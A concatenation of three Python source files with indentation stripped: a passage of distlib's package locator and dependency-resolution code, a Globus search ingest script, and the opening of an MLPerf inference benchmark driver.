requirement.
:param requirement: A requirement of the form 'foo (1.0)' or perhaps
'foo (>= 1.0, < 2.0, != 1.3)'
:param prereleases: If ``True``, allow pre-release versions
to be located. Otherwise, pre-release versions
are not returned.
:return: A :class:`Distribution` instance, or ``None`` if no such
distribution could be located.
"""
result = None
r = parse_requirement(requirement)
if r is None: # pragma: no cover
raise DistlibException('Not a valid requirement: %r' % requirement)
scheme = get_scheme(self.scheme)
self.matcher = matcher = scheme.matcher(r.requirement)
logger.debug('matcher: %s (%s)', matcher, type(matcher).__name__)
versions = self.get_project(r.name)
if len(versions) > 2: # urls and digests keys are present
# sometimes, versions are invalid
slist = []
vcls = matcher.version_class
for k in versions:
if k in ('urls', 'digests'):
continue
try:
if not matcher.match(k):
logger.debug('%s did not match %r', matcher, k)
else:
if prereleases or not vcls(k).is_prerelease:
slist.append(k)
else:
logger.debug('skipping pre-release '
'version %s of %s', k, matcher.name)
except Exception: # pragma: no cover
logger.warning('error matching %s with %r', matcher, k)
pass # slist.append(k)
if len(slist) > 1:
slist = sorted(slist, key=scheme.key)
if slist:
logger.debug('sorted list: %s', slist)
version = slist[-1]
result = versions[version]
if result:
if r.extras:
result.extras = r.extras
result.download_urls = versions.get('urls', {}).get(version, set())
d = {}
sd = versions.get('digests', {})
for url in result.download_urls:
if url in sd: # pragma: no cover
d[url] = sd[url]
result.digests = d
self.matcher = None
return result
class PyPIRPCLocator(Locator):
"""
This locator uses XML-RPC to locate distributions. It therefore
cannot be used with simple mirrors (that only mirror file content).
"""
def __init__(self, url, **kwargs):
"""
Initialise an instance.
:param url: The URL to use for XML-RPC.
:param kwargs: Passed to the superclass constructor.
"""
super(PyPIRPCLocator, self).__init__(**kwargs)
self.base_url = url
self.client = ServerProxy(url, timeout=3.0)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
return set(self.client.list_packages())
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
versions = self.client.package_releases(name, True)
for v in versions:
urls = self.client.release_urls(name, v)
data = self.client.release_data(name, v)
metadata = Metadata(scheme=self.scheme)
metadata.name = data['name']
metadata.version = data['version']
metadata.license = data.get('license')
metadata.keywords = data.get('keywords', [])
metadata.summary = data.get('summary')
dist = Distribution(metadata)
if urls:
info = urls[0]
metadata.source_url = info['url']
dist.digest = self._get_digest(info)
dist.locator = self
result[v] = dist
for info in urls:
url = info['url']
digest = self._get_digest(info)
result['urls'].setdefault(v, set()).add(url)
result['digests'][url] = digest
return result
class PyPIJSONLocator(Locator):
"""
This locator uses PyPI's JSON interface. It's very limited in functionality
and probably not worth using.
"""
def __init__(self, url, **kwargs):
super(PyPIJSONLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
url = urljoin(self.base_url, '%s/json' % quote(name))
try:
resp = self.opener.open(url)
data = resp.read().decode() # for now
d = json.loads(data)
md = Metadata(scheme=self.scheme)
data = d['info']
md.name = data['name']
md.version = data['version']
md.license = data.get('license')
md.keywords = data.get('keywords', [])
md.summary = data.get('summary')
dist = Distribution(md)
dist.locator = self
urls = d['urls']
result[md.version] = dist
for info in d['urls']:
url = info['url']
dist.download_urls.add(url)
dist.digests[url] = self._get_digest(info)
result['urls'].setdefault(md.version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# Now get other releases
for version, infos in d['releases'].items():
if version == md.version:
continue # already done
omd = Metadata(scheme=self.scheme)
omd.name = md.name
omd.version = version
odist = Distribution(omd)
odist.locator = self
result[version] = odist
for info in infos:
url = info['url']
odist.download_urls.add(url)
odist.digests[url] = self._get_digest(info)
result['urls'].setdefault(version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# for info in urls:
# md.source_url = info['url']
# dist.digest = self._get_digest(info)
# dist.locator = self
# for info in urls:
# url = info['url']
# result['urls'].setdefault(md.version, set()).add(url)
# result['digests'][url] = self._get_digest(info)
except Exception as e:
self.errors.put(text_type(e))
logger.exception('JSON fetch failed: %s', e)
return result
class Page(object):
"""
This class represents a scraped HTML page.
"""
# The following slightly hairy-looking regex just looks for the contents of
# an anchor link, which has an attribute "href" either immediately preceded
# or immediately followed by a "rel" attribute. The attribute values can be
# declared with double quotes, single quotes or no quotes - which leads to
# the length of the expression.
_href = re.compile("""
(rel\\s*=\\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\\s\n]*))\\s+)?
href\\s*=\\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\\s\n]*))
(\\s+rel\\s*=\\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\\s\n]*)))?
""", re.I | re.S | re.X)
_base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S)
def __init__(self, data, url):
"""
Initialise an instance with the Unicode page contents and the URL they
came from.
"""
self.data = data
self.base_url = self.url = url
m = self._base.search(self.data)
if m:
self.base_url = m.group(1)
_clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I)
@cached_property
def links(self):
"""
Return the URLs of all the links on a page together with information
about their "rel" attribute, for determining which ones to treat as
downloads and which ones to queue for further scraping.
"""
def clean(url):
"Tidy up an URL."
scheme, netloc, path, params, query, frag = urlparse(url)
return urlunparse((scheme, netloc, quote(path),
params, query, frag))
result = set()
for match in self._href.finditer(self.data):
d = match.groupdict('')
rel = (d['rel1'] or d['rel2'] or d['rel3'] or
d['rel4'] or d['rel5'] or d['rel6'])
url = d['url1'] or d['url2'] or d['url3']
url = urljoin(self.base_url, url)
url = unescape(url)
url = self._clean_re.sub(lambda m: '%%%2x' % ord(m.group(0)), url)
result.add((url, rel))
# We sort the result, hoping to bring the most recent versions
# to the front
result = sorted(result, key=lambda t: t[0], reverse=True)
return result
class SimpleScrapingLocator(Locator):
"""
A locator which scrapes HTML pages to locate downloads for a distribution.
This runs multiple threads to do the I/O; performance is at least as good
as pip's PackageFinder, which works in an analogous fashion.
"""
# These are used to deal with various Content-Encoding schemes.
decoders = {
'deflate': zlib.decompress,
'gzip': lambda b: gzip.GzipFile(fileobj=BytesIO(d)).read(),
'none': lambda b: b,
}
def __init__(self, url, timeout=None, num_workers=10, **kwargs):
"""
Initialise an instance.
:param url: The root URL to use for scraping.
:param timeout: The timeout, in seconds, to be applied to requests.
This defaults to ``None`` (no timeout specified).
:param num_workers: The number of worker threads you want to do I/O,
This defaults to 10.
:param kwargs: Passed to the superclass.
"""
super(SimpleScrapingLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
self.timeout = timeout
self._page_cache = {}
self._seen = set()
self._to_fetch = queue.Queue()
self._bad_hosts = set()
self.skip_externals = False
self.num_workers = num_workers
self._lock = threading.RLock()
# See issue #45: we need to be resilient when the locator is used
# in a thread, e.g. with concurrent.futures. We can't use self._lock
# as it is for coordinating our internal threads - the ones created
# in _prepare_threads.
self._gplock = threading.RLock()
self.platform_check = False # See issue #112
def _prepare_threads(self):
"""
Threads are created only when get_project is called, and terminate
before it returns. They are there primarily to parallelise I/O (i.e.
fetching web pages).
"""
self._threads = []
for i in range(self.num_workers):
t = threading.Thread(target=self._fetch)
t.setDaemon(True)
t.start()
self._threads.append(t)
def _wait_threads(self):
"""
Tell all the threads to terminate (by sending a sentinel value) and
wait for them to do so.
"""
# Note that you need two loops, since you can't say which
# thread will get each sentinel
for t in self._threads:
self._to_fetch.put(None) # sentinel
for t in self._threads:
t.join()
self._threads = []
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
with self._gplock:
self.result = result
self.project_name = name
url = urljoin(self.base_url, '%s/' % quote(name))
self._seen.clear()
self._page_cache.clear()
self._prepare_threads()
try:
logger.debug('Queueing %s', url)
self._to_fetch.put(url)
self._to_fetch.join()
finally:
self._wait_threads()
del self.result
return result
platform_dependent = re.compile(r'\b(linux_(i\d86|x86_64|arm\w+)|'
r'win(32|_amd64)|macosx_?\d+)\b', re.I)
def _is_platform_dependent(self, url):
"""
Does an URL refer to a platform-specific download?
"""
return self.platform_dependent.search(url)
def _process_download(self, url):
"""
See if an URL is a suitable download for a project.
If it is, register information in the result dictionary (for
_get_project) about the specific version it's for.
Note that the return value isn't actually used other than as a boolean
value.
"""
if self.platform_check and self._is_platform_dependent(url):
info = None
else:
info = self.convert_url_to_download_info(url, self.project_name)
logger.debug('process_download: %s -> %s', url, info)
if info:
with self._lock: # needed because self.result is shared
self._update_version_data(self.result, info)
return info
def _should_queue(self, link, referrer, rel):
"""
Determine whether a link URL from a referring page and with a
particular "rel" attribute should be queued for scraping.
"""
scheme, netloc, path, _, _, _ = urlparse(link)
if path.endswith(self.source_extensions + self.binary_extensions +
self.excluded_extensions):
result = False
elif self.skip_externals and not link.startswith(self.base_url):
result = False
elif not referrer.startswith(self.base_url):
result = False
elif rel not in ('homepage', 'download'):
result = False
elif scheme not in ('http', 'https', 'ftp'):
result = False
elif self._is_platform_dependent(link):
result = False
else:
host = netloc.split(':', 1)[0]
if host.lower() == 'localhost':
result = False
else:
result = True
logger.debug('should_queue: %s (%s) from %s -> %s', link, rel,
referrer, result)
return result
def _fetch(self):
"""
Get a URL to fetch from the work queue, get the HTML page, examine its
links for download candidates and candidates for further scraping.
This is a handy method to run in a thread.
"""
while True:
url = self._to_fetch.get()
try:
if url:
page = self.get_page(url)
if page is None: # e.g. after an error
continue
for link, rel in page.links:
if link not in self._seen:
try:
self._seen.add(link)
if (not self._process_download(link) and
self._should_queue(link, url, rel)):
logger.debug('Queueing %s from %s', link, url)
self._to_fetch.put(link)
except MetadataInvalidError: # e.g. invalid versions
pass
except Exception as e: # pragma: no cover
self.errors.put(text_type(e))
finally:
# always do this, to avoid hangs :-)
self._to_fetch.task_done()
if not url:
#logger.debug('Sentinel seen, quitting.')
break
def get_page(self, url):
"""
Get the HTML for an URL, possibly from an in-memory cache.
XXX TODO Note: this cache is never actually cleared. It's assumed that
the data won't get stale over the lifetime of a locator instance (not
necessarily true for the default_locator).
"""
# http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api
scheme, netloc, path, _, _, _ = urlparse(url)
if scheme == 'file' and os.path.isdir(url2pathname(path)):
url = urljoin(ensure_slash(url), 'index.html')
if url in self._page_cache:
result = self._page_cache[url]
logger.debug('Returning %s from cache: %s', url, result)
else:
host = netloc.split(':', 1)[0]
result = None
if host in self._bad_hosts:
logger.debug('Skipping %s due to bad host %s', url, host)
else:
req = Request(url, headers={'Accept-encoding': 'identity'})
try:
logger.debug('Fetching %s', url)
resp = self.opener.open(req, timeout=self.timeout)
logger.debug('Fetched %s', url)
headers = resp.info()
content_type = headers.get('Content-Type', '')
if HTML_CONTENT_TYPE.match(content_type):
final_url = resp.geturl()
data = resp.read()
encoding = headers.get('Content-Encoding')
if encoding:
decoder = self.decoders[encoding] # fail if not found
data = decoder(data)
encoding = 'utf-8'
m = CHARSET.search(content_type)
if m:
encoding = m.group(1)
try:
data = data.decode(encoding)
except UnicodeError: # pragma: no cover
data = data.decode('latin-1') # fallback
result = Page(data, final_url)
self._page_cache[final_url] = result
except HTTPError as e:
if e.code != 404:
logger.exception('Fetch failed: %s: %s', url, e)
except URLError as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
with self._lock:
self._bad_hosts.add(host)
except Exception as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
finally:
self._page_cache[url] = result # even if None (failure)
return result
_distname_re = re.compile('<a href=[^>]*>([^<]+)<')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
page = self.get_page(self.base_url)
if not page:
raise DistlibException('Unable to get %s' % self.base_url)
for match in self._distname_re.finditer(page.data):
result.add(match.group(1))
return result
class DirectoryLocator(Locator):
"""
This class locates distributions in a directory tree.
"""
def __init__(self, path, **kwargs):
"""
Initialise an instance.
:param path: The root of the directory tree to search.
:param kwargs: Passed to the superclass constructor,
except for:
* recursive - if True (the default), subdirectories are
recursed into. If False, only the top-level directory
is searched,
"""
self.recursive = kwargs.pop('recursive', True)
super(DirectoryLocator, self).__init__(**kwargs)
path = os.path.abspath(path)
if not os.path.isdir(path): # pragma: no cover
raise DistlibException('Not a directory: %r' % path)
self.base_dir = path
def should_include(self, filename, parent):
"""
Should a filename be considered as a candidate for a distribution
archive? As well as the filename, the directory which contains it
is provided, though not used by the current implementation.
"""
return filename.endswith(self.downloadable_extensions)
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, name)
if info:
self._update_version_data(result, info)
if not self.recursive:
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
class JSONLocator(Locator):
"""
This locator uses special extended metadata (not available on PyPI) and is
the basis of performant dependency resolution in distlib. Other locators
require archive downloads before dependencies can be determined! As you
might imagine, that can be slow.
"""
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
data = get_project_data(name)
if data:
for info in data.get('files', []):
if info['ptype'] != 'sdist' or info['pyversion'] != 'source':
continue
# We don't store summary in project metadata as it makes
# the data bigger for no benefit during dependency
# resolution
dist = make_dist(data['name'], info['version'],
summary=data.get('summary',
'Placeholder for summary'),
scheme=self.scheme)
md = dist.metadata
md.source_url = info['url']
# TODO SHA256 digest
if 'digest' in info and info['digest']:
dist.digest = ('md5', info['digest'])
md.dependencies = info.get('requirements', {})
dist.exports = info.get('exports', {})
result[dist.version] = dist
result['urls'].setdefault(dist.version, set()).add(info['url'])
return result
class DistPathLocator(Locator):
"""
This locator finds installed distributions in a path. It can be useful for
adding to an :class:`AggregatingLocator`.
"""
def __init__(self, distpath, **kwargs):
"""
Initialise an instance.
:param distpath: A :class:`DistributionPath` instance to search.
"""
super(DistPathLocator, self).__init__(**kwargs)
assert isinstance(distpath, DistributionPath)
self.distpath = distpath
def _get_project(self, name):
dist = self.distpath.get_distribution(name)
if dist is None:
result = {'urls': {}, 'digests': {}}
else:
result = {
dist.version: dist,
'urls': {dist.version: set([dist.source_url])},
'digests': {dist.version: set([None])}
}
return result
class AggregatingLocator(Locator):
"""
This class allows you to chain and/or merge a list of locators.
"""
def __init__(self, *locators, **kwargs):
"""
Initialise an instance.
:param locators: The list of locators to search.
:param kwargs: Passed to the superclass constructor,
except for:
* merge - if False (the default), the first successful
search from any of the locators is returned. If True,
the results from all locators are merged (this can be
slow).
"""
self.merge = kwargs.pop('merge', False)
self.locators = locators
super(AggregatingLocator, self).__init__(**kwargs)
def clear_cache(self):
super(AggregatingLocator, self).clear_cache()
for locator in self.locators:
locator.clear_cache()
def _set_scheme(self, value):
self._scheme = value
for locator in self.locators:
locator.scheme = value
scheme = property(Locator.scheme.fget, _set_scheme)
def _get_project(self, name):
result = {}
for locator in self.locators:
d = locator.get_project(name)
if d:
if self.merge:
files = result.get('urls', {})
digests = result.get('digests', {})
# next line could overwrite result['urls'], result['digests']
result.update(d)
df = result.get('urls')
if files and df:
for k, v in files.items():
if k in df:
df[k] |= v
else:
df[k] = v
dd = result.get('digests')
if digests and dd:
dd.update(digests)
else:
# See issue #18. If any dists are found and we're looking
# for specific constraints, we only return something if
# a match is found. For example, if a DirectoryLocator
# returns just foo (1.0) while we're looking for
# foo (>= 2.0), we'll pretend there was nothing there so
# that subsequent locators can be queried. Otherwise we
# would just return foo (1.0) which would then lead to a
# failure to find foo (>= 2.0), because other locators
# weren't searched. Note that this only matters when
# merge=False.
if self.matcher is None:
found = True
else:
found = False
for k in d:
if self.matcher.match(k):
found = True
break
if found:
result = d
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for locator in self.locators:
try:
result |= locator.get_distribution_names()
except NotImplementedError:
pass
return result
# We use a legacy scheme simply because most of the dists on PyPI use legacy
# versions which don't conform to PEP 426 / PEP 440.
default_locator = AggregatingLocator(
JSONLocator(),
SimpleScrapingLocator('https://pypi.org/simple/',
timeout=3.0),
scheme='legacy')
locate = default_locator.locate
NAME_VERSION_RE = re.compile(r'(?P<name>[\w-]+)\s*'
r'\(\s*(==\s*)?(?P<ver>[^)]+)\)$')
class DependencyFinder(object):
"""
Locate dependencies for distributions.
"""
def __init__(self, locator=None):
"""
Initialise an instance, using the specified locator
to locate distributions.
"""
self.locator = locator or default_locator
self.scheme = get_scheme(self.locator.scheme)
def add_distribution(self, dist):
"""
Add a distribution to the finder. This will update internal information
about who provides what.
:param dist: The distribution to add.
"""
logger.debug('adding distribution %s', dist)
name = dist.key
self.dists_by_name[name] = dist
self.dists[(name, dist.version)] = dist
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Add to provided: %s, %s, %s', name, version, dist)
self.provided.setdefault(name, set()).add((version, dist))
def remove_distribution(self, dist):
"""
Remove a distribution from the finder. This will update internal
information about who provides what.
:param dist: The distribution to remove.
"""
logger.debug('removing distribution %s', dist)
name = dist.key
del self.dists_by_name[name]
del self.dists[(name, dist.version)]
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Remove from provided: %s, %s, %s', name, version, dist)
s = self.provided[name]
s.remove((version, dist))
if not s:
del self.provided[name]
def get_matcher(self, reqt):
"""
Get a version matcher for a requirement.
:param reqt: The requirement
:type reqt: str
:return: A version matcher (an instance of
:class:`distlib.version.Matcher`).
"""
try:
matcher = self.scheme.matcher(reqt)
except UnsupportedVersionError: # pragma: no cover
# XXX compat-mode if cannot read the version
name = reqt.split()[0]
matcher = self.scheme.matcher(name)
return matcher
def find_providers(self, reqt):
"""
Find the distributions which can fulfill a requirement.
:param reqt: The requirement.
:type reqt: str
:return: A set of distribution which can fulfill the requirement.
"""
matcher = self.get_matcher(reqt)
name = matcher.key # case-insensitive
result = set()
provided = self.provided
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
result.add(provider)
break
return result
def try_to_replace(self, provider, other, problems):
"""
Attempt to replace one provider with another. This is typically used
when resolving dependencies from multiple sources, e.g. A requires
(B >= 1.0) while C requires (B >= 1.1).
For successful replacement, ``provider`` must meet all the requirements
which ``other`` fulfills.
:param provider: The provider we are trying to replace with.
:param other: The provider we're trying to replace.
:param problems: If False is returned, this will contain what
problems prevented replacement. This is currently
a tuple of the literal string 'cantreplace',
``provider``, ``other`` and the set of requirements
that ``provider`` couldn't fulfill.
:return: True if we can replace ``other`` with ``provider``, else
False.
"""
rlist = self.reqts[other]
unmatched = set()
for s in rlist:
matcher = self.get_matcher(s)
if not matcher.match(provider.version):
unmatched.add(s)
if unmatched:
# can't replace other with provider
problems.add(('cantreplace', provider, other,
frozenset(unmatched)))
result = False
else:
# can replace other with provider
self.remove_distribution(other)
del self.reqts[other]
for s in rlist:
self.reqts.setdefault(provider, set()).add(s)
self.add_distribution(provider)
result = True
return result
def find(self, requirement, meta_extras=None, prereleases=False):
"""
Find a distribution and all distributions it depends on.
:param requirement: The requirement specifying the distribution to
find, or a Distribution instance.
:param meta_extras: A list of meta extras such as :test:, :build: and
so on.
:param prereleases: If ``True``, allow pre-release versions to be
returned - otherwise, don't return prereleases
unless they're all that's available.
Return a set of :class:`Distribution` instances and a set of
problems.
The distributions returned should be such that they have the
:attr:`required` attribute set to ``True`` if they were
from the ``requirement`` passed to ``find()``, and they have the
:attr:`build_time_dependency` attribute set to ``True`` unless they
are post-installation dependencies of the ``requirement``.
The problems should be a tuple consisting of the string
``'unsatisfied'`` and the requirement which couldn't be satisfied
by any distribution known to the locator.
"""
self.provided = {}
self.dists = {}
self.dists_by_name = {}
self.reqts = {}
meta_extras = set(meta_extras or [])
if ':*:' in meta_extras:
meta_extras.remove(':*:')
# :meta: and :run: are implicitly included
meta_extras |= set([':test:', ':build:', ':dev:'])
if isinstance(requirement, Distribution):
dist = odist = requirement
logger.debug('passed %s as requirement', odist)
else:
dist = odist = self.locator.locate(requirement,
prereleases=prereleases)
if dist is None:
raise DistlibException('Unable to locate %r' % requirement)
logger.debug('located %s', odist)
dist.requested = True
problems = set()
todo = set([dist])
install_dists = set([odist])
while todo:
dist = todo.pop()
name = dist.key # case-insensitive
if name not in self.dists_by_name:
self.add_distribution(dist)
else:
#import pdb; pdb.set_trace()
other = self.dists_by_name[name]
if other != dist:
self.try_to_replace(dist, other, problems)
ireqts = dist.run_requires | dist.meta_requires
sreqts = dist.build_requires
ereqts = set()
if meta_extras and dist in install_dists:
for key in ('test', 'build', 'dev'):
e = ':%s:' % key
if e in meta_extras:
ereqts |= getattr(dist, '%s_requires' % key)
all_reqts = ireqts | sreqts | ereqts
for r in all_reqts:
providers = self.find_providers(r)
if not providers:
logger.debug('No providers found for %r', r)
provider = self.locator.locate(r, prereleases=prereleases)
# If no provider is found and we didn't consider
# prereleases, consider them now.
if provider is None and not prereleases:
provider = self.locator.locate(r, prereleases=True)
if provider is None:
logger.debug('Cannot satisfy %r', r)
problems.add(('unsatisfied', r))
else:
n, v = provider.key, provider.version
if (n, v) not in self.dists:
todo.add(provider)
providers.add(provider)
if r in ireqts and dist in install_dists:
install_dists.add(provider)
logger.debug('Adding %s to install_dists',
provider.name_and_version)
for p in providers:
name = p.key
if name not in self.dists_by_name:
self.reqts.setdefault(p, set()).add(r)
else:
other = self.dists_by_name[name]
if other != p:
# see if other can be replaced by p
self.try_to_replace(p, other, problems)
dists = set(self.dists.values())
for dist in dists:
dist.build_time_dependency = dist not in install_dists
if dist.build_time_dependency:
logger.debug('%s is a build-time dependency only.',
dist.name_and_version)
logger.debug('find done for %s', odist)
return dists, problems
|
ingester.py
|
import sys
import json
import os
import multiprocessing
from queue import Empty
from tqdm import tqdm
from globus_sdk import GlobusAPIError
from mdf_forge.toolbox import format_gmeta, confidential_login
from mdf_refinery.config import PATH_FEEDSTOCK, PATH_CREDENTIALS
NUM_SUBMITTERS = 5
def ingest(mdf_source_names, globus_index, batch_size=100, verbose=False):
''' Ingests feedstock from file.
Arguments:
mdf_source_names (str or list of str): Dataset name(s) to ingest.
Special value "all" will ingest all feedstock in the feedstock directory.
batch_size (int): Max size of a single ingest operation. -1 for unlimited. Default 100.
verbose (bool): Print status messages? Default False.
'''
if type(mdf_source_names) is str:
mdf_source_names = [mdf_source_names]
if "all" in mdf_source_names:
mdf_source_names = [feed.replace("_all.json", "") for feed in os.listdir(PATH_FEEDSTOCK) if feed.endswith("_all.json")]
if verbose:
print("\nStarting ingest of:\n", mdf_source_names, "\nIndex:", globus_index, "\nBatch size:", batch_size, "\n")
with open(os.path.join(PATH_CREDENTIALS, "ingester_login.json")) as cred_file:
creds = json.load(cred_file)
creds["index"] = globus_index
ingest_client = confidential_login(credentials=creds)["search_ingest"]
# Set up multiprocessing
ingest_queue = multiprocessing.JoinableQueue()
counter = multiprocessing.Value('i', 0)
killswitch = multiprocessing.Value('i', 0)
# One reader (can reduce performance on large datasets if multiple are submitted at once)
reader = multiprocessing.Process(target=queue_ingests, args=(ingest_queue, mdf_source_names, batch_size))
# As many submitters as is feasible
submitters = [multiprocessing.Process(target=process_ingests, args=(ingest_queue, ingest_client, counter, killswitch)) for i in range(NUM_SUBMITTERS)]
prog_bar = multiprocessing.Process(target=track_progress, args=(counter, killswitch))
reader.start()
[s.start() for s in submitters]
if verbose:
prog_bar.start()
reader.join()
ingest_queue.join()
killswitch.value = 1
[s.join() for s in submitters]
if prog_bar.is_alive():
prog_bar.join()
if verbose:
print("Ingesting complete")
def queue_ingests(ingest_queue, sources, batch_size):
for source_name in sources:
list_ingestables = []
with open(os.path.join(PATH_FEEDSTOCK, source_name+"_all.json"), 'r') as feedstock:
for json_record in feedstock:
record = format_gmeta(json.loads(json_record))
list_ingestables.append(record)
if batch_size > 0 and len(list_ingestables) >= batch_size:
full_ingest = format_gmeta(list_ingestables)
ingest_queue.put(json.dumps(full_ingest))
list_ingestables.clear()
# Check for partial batch to ingest
if list_ingestables:
full_ingest = format_gmeta(list_ingestables)
ingest_queue.put(json.dumps(full_ingest))
list_ingestables.clear()
def process_ingests(ingest_queue, ingest_client, counter, killswitch):
while killswitch.value == 0:
try:
ingestable = json.loads(ingest_queue.get(timeout=10))
except Empty:
continue
try:
res = ingest_client.ingest(ingestable)
if not res["success"]:
raise ValueError("Ingest failed: " + str(res))
elif res["num_documents_ingested"] <= 0:
raise ValueError("No documents ingested: " + str(res))
except GlobusAPIError as e:
print("\nA Globus API Error has occurred. Details:\n", e.raw_json, "\n")
continue
with counter.get_lock():
counter.value += 1
ingest_queue.task_done()
def track_progress(counter, killswitch):
with tqdm(desc="Ingesting feedstock batches") as prog:
old_counter = 0
while killswitch.value == 0:
# Update tqdm with difference in all counters
new_counter = counter.value
prog.update(new_counter - old_counter)
old_counter = new_counter
|
main.py
|
"""
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import array
import collections
import json
import logging
import os
import sys
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import imagenet
import coco
import re
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"imagenet":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommon(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet":
(imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.PostProcessArgMax(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_pytorch":
(imagenet.Imagenet, dataset.pre_process_imagenet_pytorch, dataset.PostProcessArgMax(offset=0),
{"image_size": [224, 224, 3]}),
"coco-300":
(coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCoco(),
{"image_size": [300, 300, 3]}),
"coco-300-pt":
(coco.Coco, dataset.pre_process_coco_pt_mobilenet, coco.PostProcessCocoPt(False,0.3),
{"image_size": [300, 300, 3]}),
"coco-1200":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCoco(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-onnx":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoOnnx(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-pt":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoPt(True,0.05),
{"image_size": [1200, 1200, 3],"use_label_map": True}),
"coco-1200-tf":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoTf(),
{"image_size": [1200, 1200, 3],"use_label_map": False}),
}
# pre-defined command line options so simplify things. They are used as defaults and can be
# overwritten from command line
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"max-batchsize": 32,
},
# resnet
"resnet50-tf": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tensorflow",
"model-name": "resnet50",
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
"backend": "onnxruntime",
"model-name": "resnet50",
},
# mobilenet
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"model-name": "mobilenet",
},
"mobilenet-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"model-name": "mobilenet",
},
# ssd-mobilenet
"ssd-mobilenet-tf": {
"inputs": "image_tensor:0",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"dataset": "coco-300",
"backend": "tensorflow",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-300-pt",
"backend": "pytorch-native",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-onnxruntime": {
"dataset": "coco-300",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-mobilenet",
},
# ssd-resnet34
"ssd-resnet34-tf": {
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"dataset": "coco-1200-tf",
"backend": "tensorflow",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime": {
"dataset": "coco-1200-onnx",
"inputs": "image",
"outputs": "bboxes,labels,scores",
"backend": "onnxruntime",
"data-format": "NCHW",
"max-batchsize": 1,
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime-tf": {
"dataset": "coco-1200-tf",
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-resnet34",
},
}
SCENARIO_MAP = {
"SingleStream": lg.TestScenario.SingleStream,
"MultiStream": lg.TestScenario.MultiStream,
"Server": lg.TestScenario.Server,
